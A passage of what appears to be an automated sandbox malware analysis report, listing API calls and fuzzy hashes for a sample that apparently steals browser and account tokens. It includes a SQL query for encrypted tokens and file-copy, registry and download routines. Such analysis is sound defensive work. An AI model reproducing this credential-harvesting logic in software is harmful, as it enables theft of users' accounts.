                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F5017
                                    • lstrcat.KERNEL32(?,00421000), ref: 007F5034
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4B93
                                      • Part of subcall function 007F4B77: FindFirstFileA.KERNEL32(?,?), ref: 007F4BAA
                                    • memset.MSVCRT ref: 007F507A
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F50A3
                                    • lstrcat.KERNEL32(?,00421020), ref: 007F50C0
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 007F4BD8
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 007F4BEE
                                      • Part of subcall function 007F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DE4
                                      • Part of subcall function 007F4B77: FindClose.KERNEL32(000000FF), ref: 007F4DF9
                                    • memset.MSVCRT ref: 007F5106
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F512F
                                    • lstrcat.KERNEL32(?,00421038), ref: 007F514C
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4C17
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 007F4C2C
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4C49
                                      • Part of subcall function 007F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 007F4C85
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,0064A524), ref: 007F4CB1
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 007F4CC3
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,?), ref: 007F4CD7
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 007F4CE9
                                      • Part of subcall function 007F4B77: lstrcat.KERNEL32(?,?), ref: 007F4CFD
                                      • Part of subcall function 007F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 007F4D13
                                      • Part of subcall function 007F4B77: DeleteFileA.KERNEL32(?), ref: 007F4D98
                                    • memset.MSVCRT ref: 007F5192
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID:
                                    • API String ID: 4017274736-0
                                    • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                    • Instruction ID: 887b4a8fb6aabcf7ebcc726c75a41452b416ab7b75ff69b6a76f06a2794879b6
                                    • Instruction Fuzzy Hash: 764188B9A40318B7D714F7B0EC4BFED7738AB24701F804454B689661C1EEB997D88B92
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 007F8397
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F839E
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007F83BF
                                    • __aulldiv.LIBCMT ref: 007F83D9
                                    • __aulldiv.LIBCMT ref: 007F83E7
                                    • wsprintfA.USER32 ref: 007F8413
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: @
                                    • API String ID: 2774356765-2766056989
                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                    • Instruction ID: 92991d14b4a0c95ac75e2d4afaa4f9fc0b2d53ea93097ade083f16c09610f2e7
                                    • Instruction Fuzzy Hash: 842127B1A44218ABDB10DFD5CC4AFBEBBB9FB44B14F104609F615AB280C7786900CBA5
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 1440504306-1079375795
                                    • Opcode ID: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                    • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                    • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: B
                                    • API String ID: 1494266314-2248957098
                                    • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                    • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                    • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                      • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                    • memset.MSVCRT ref: 00409EE8
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 1977917189-1096346117
                                    • Opcode ID: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                    APIs
                                      • Part of subcall function 007E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E75A1
                                      • Part of subcall function 007E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7618
                                      • Part of subcall function 007E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 007E7674
                                      • Part of subcall function 007E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 007E76B9
                                      • Part of subcall function 007E7537: HeapFree.KERNEL32(00000000), ref: 007E76C0
                                    • lstrcat.KERNEL32(0064A668,004217FC), ref: 007E786D
                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 007E78AF
                                    • lstrcat.KERNEL32(0064A668,00421800), ref: 007E78C1
                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 007E78F6
                                    • lstrcat.KERNEL32(0064A668,00421804), ref: 007E7907
                                    • lstrcat.KERNEL32(0064A668,00000000), ref: 007E793A
                                    • lstrcat.KERNEL32(0064A668,00421808), ref: 007E7954
                                    • task.LIBCPMTD ref: 007E7962
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID:
                                    • API String ID: 2677904052-0
                                    • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                    • Instruction ID: bc6df98e102588396b2738070035e13f124b4814623991c261b2a41db0834991
                                    • Instruction Fuzzy Hash: 01315E79A41149EFDB08FBE0DC99DFE777AEB59301B105018E106A7291DA38A942CB62
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007E5231
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E5238
                                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 007E5251
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007E5278
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 007E52A8
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 007E52F1
                                    • InternetCloseHandle.WININET(?), ref: 007E5320
                                    • InternetCloseHandle.WININET(?), ref: 007E532D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 1008454911-0
                                    • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                    • Instruction ID: 7cb8ca595f561429de0f029a9c0edd12ef2c9cc99d7a6d6185c3db2bb73808e4
                                    • Instruction Fuzzy Hash: 3A31E7B4A40218EBDB20CF94DC89BDCB7B5FB48704F5081D9E709A7281D7746A858F59
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                    • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                    • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                    • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                    • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                    • InternetCloseHandle.WININET(?), ref: 004050C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 3894370878-0
                                    • Opcode ID: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                    • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                    • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                    APIs
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 007F58AB
                                    • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 007F5908
                                    • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 007F5ABE
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 007F548F
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 007F557F
                                      • Part of subcall function 007F5527: lstrlen.KERNEL32(00000000), ref: 007F5596
                                      • Part of subcall function 007F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 007F55CB
                                      • Part of subcall function 007F5527: lstrlen.KERNEL32(00000000), ref: 007F55EA
                                      • Part of subcall function 007F5527: strtok.MSVCRT(00000000,?), ref: 007F5605
                                      • Part of subcall function 007F5527: lstrlen.KERNEL32(00000000), ref: 007F5615
                                    • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 007F59F2
                                    • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 007F5BA7
                                    • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 007F5C73
                                    • Sleep.KERNEL32(0000EA60), ref: 007F5C82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                    • String ID:
                                    • API String ID: 3630751533-0
                                    • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                    • Instruction ID: 1e1068383d9630962c7ef7f62c90b1cede7cde444e5fabb5c7aa9c5e53c2141e
                                    • Instruction Fuzzy Hash: B9E10FB190020CEACB18FBA0DD9ADFD7379AF55300F50C168B64A56291EF786B4CCB52
                                    APIs
                                    • memset.MSVCRT ref: 007E158E
                                      • Part of subcall function 007E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E151B
                                      • Part of subcall function 007E1507: RtlAllocateHeap.NTDLL(00000000), ref: 007E1522
                                      • Part of subcall function 007E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E153E
                                      • Part of subcall function 007E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E155C
                                      • Part of subcall function 007E1507: RegCloseKey.ADVAPI32(?), ref: 007E1566
                                    • lstrcat.KERNEL32(?,00000000), ref: 007E15B6
                                    • lstrlen.KERNEL32(?), ref: 007E15C3
                                    • lstrcat.KERNEL32(?,004262EC), ref: 007E15DE
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 007E16CC
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                      • Part of subcall function 007E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                      • Part of subcall function 007E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                      • Part of subcall function 007E9C27: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                      • Part of subcall function 007E9C27: LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                      • Part of subcall function 007E9C27: CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                    • DeleteFileA.KERNEL32(00000000), ref: 007E1756
                                    • memset.MSVCRT ref: 007E177D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID:
                                    • API String ID: 3885987321-0
                                    • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                    • Instruction ID: 3c56daf5e626ddec273cff0fd7809bbc5c74b596a4458e1dcf16ee39091498f5
                                    • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                    • Instruction Fuzzy Hash: C1513EB1940218EBCB15FB60DD96EFD7378AF54300F4041A8B70E62182EE785B89CE66
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                    • wsprintfA.USER32 ref: 00418459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,00A19940,00000000,000F003F,?,00000400), ref: 004184EC
                                    • lstrlenA.KERNEL32(?), ref: 00418501
                                    • RegQueryValueExA.ADVAPI32(00000000,00A19970,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                    • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                    • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                    • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                    • Instruction ID: 9609bd1d87150249e719ced9e48386f459193661c3168745e42c101ca9284d60
                                    • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                    • Instruction Fuzzy Hash: BD2129B5D00219ABDF14DFA4E849AED7B74FF44321F108225F929A7290EB746A05CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F790B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7912
                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 007F7944
                                    • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 007F7965
                                    • RegCloseKey.ADVAPI32(00000000), ref: 007F796F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction ID: c0af3ecfc1cfe13cd0de9bda0f35f5489ca25c74be814294f3072938a60a5cb9
                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction Fuzzy Hash: 68012CB9A84208FBEB04DBE4DD49FADB7B9EB48701F109154BA0596281D6B4A900CB51
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                    • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A15530,00000000,00020119,00000000), ref: 004176DD
                                    • RegQueryValueExA.ADVAPI32(00000000,00A197F0,00000000,00000000,?,000000FF), ref: 004176FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3466090806-2517555085
                                    • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                    • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                    • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                    • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00A15530,00000000,00020119,004176B9), ref: 0041775B
                                    • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                    • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
